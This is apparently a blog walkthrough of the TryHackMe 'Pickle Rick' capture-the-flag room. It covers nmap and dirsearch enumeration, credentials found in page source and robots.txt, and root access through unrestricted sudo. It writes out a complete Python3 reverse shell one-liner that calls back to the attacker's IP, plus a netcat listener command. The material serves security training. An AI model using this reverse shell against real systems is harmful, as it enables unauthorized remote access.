Room link : https://tryhackme.com/room/picklerick
As always we need to enumerate the services running on the machine. Let’s start with a nmap scan on the machine
nmap IP -sV -T4
IP: IP address of the machine
-sV: Enable service detection
-T4: Make the scan faster
$ nmap IP -sV -T4Starting Nmap 7.91 ( https://nmap.org ) at 2021–06–27 11:17 EDT
Nmap scan report for IP
Host is up (0.39s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.24 seconds
Now we know there are 2 open ports running 22 and 80.
22 runs SSH
80 runs HTTP
Let’s visit port 80. (Webserver)
Checking the page source we find a interesting username.
Let’s use dirsearch to find all the sub directories.
sudo dirsearch -u http://IP -x 404,403 -t 200
-u: URL to brute-x: Hide specific status codes-t: Specify the number of threads
[11:27:52] 301–311B — /assets -> http://10.10.73.35/assets/
[11:27:53] 200–2KB — /assets/
[11:27:58] 200–1KB — /index.html
[11:28:00] 200–882B — /login.php
[11:28:05] 200–17B — /robots.txtLets visit /robots.txt
$ curl http://10.10.73.35/robots.txt
Wu....dubWe find a weird text. Maybe this is a password?
Let’s try that in the /login.php page.
We can successfully login using those credentials.
After logging in we can see this page
Let’s try to use the ls -la command to list all the files.
We can see a lot of files. Now we can try to get a reverse shell on the machine using a python reverse shell.
Firstly let’s check if the machine has python or python3. We can check that by using which python or which python3
We can see that it has python3 installed. So let’s use a python3 reverse shell.
On the attackers machine lets set up a netcat listener using : nc -lvnp 1337
You can specify any port, I like to use the port 1337
You can find the reverse shell code here → https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Click on Python
(Remember to change python in the beginning to python3 as the machine has python3 installed.)
Copy that reverse shell code and use any text edittor to change the IP address to your tun0 IP (ifconfig tun0) and the port you set for listening the reverse connection in netcat. (We specified 1337)
So the code would look like this for me (I have changed python to python3, port to 1337 and IP to the IP address of my tun0 interface)
python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“yourtun0ip”,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)’Let’s paste this in the command execution panel.
Make sure to set up the listener nc -lvnp 1337
Now lets look at the contents of Sup3rS3cretPickl3Ingred.txt.
www-data@ip-10–10–180–175:/var/www/html$ cat Sup3rS3cretPickl3Ingred.txt
cat Sup3rS3cretPickl3Ingred.txt
mr. ........ hairThis gives us the answer for the first question : What is the first ingredient Rick needs?
Let’s look at the clue.txt file.
www-data@ip-10–10–180–175:/var/www/html$ cat clue.txt
cat clue.txt
Look around the file system for the other ingredient.I first went to the /home directory where we found 2 users rick and ubuntu.
www-data@ip-10–10–180–175:/home$ ls
ls
rick ubuntuBrowsing in rick’s directory we find the second ingredient.
The contents of the file answers the second question : Whats the second ingredient Rick needs?
Remeber to use ”” because the name of the file is 2 words. Else you will get an error like this.
cat “second ingredients”
www-data@ip-10–10–180–175:/home/rick$ cat “second ingredients”
cat “second ingredients”
1 ..... tearNow for the final task.
I got a hint that the final answer is hidden in the /root directory.
www-data@ip-10–10–180–175:/home/rick$ cd /root
cd /root
bash: cd: /root: Permission deniedWe get a permission denied error, so let’s escalate to the root user.
The most common way is to check the sudo rights of the user using the sudo -l command.
We can run any command with sudo to get root user access
Let’s run sudo su. This will give us the root shell
Let’s browse the /root directory and get the answer to task 3 : Whats the final ingredient Rick needs?
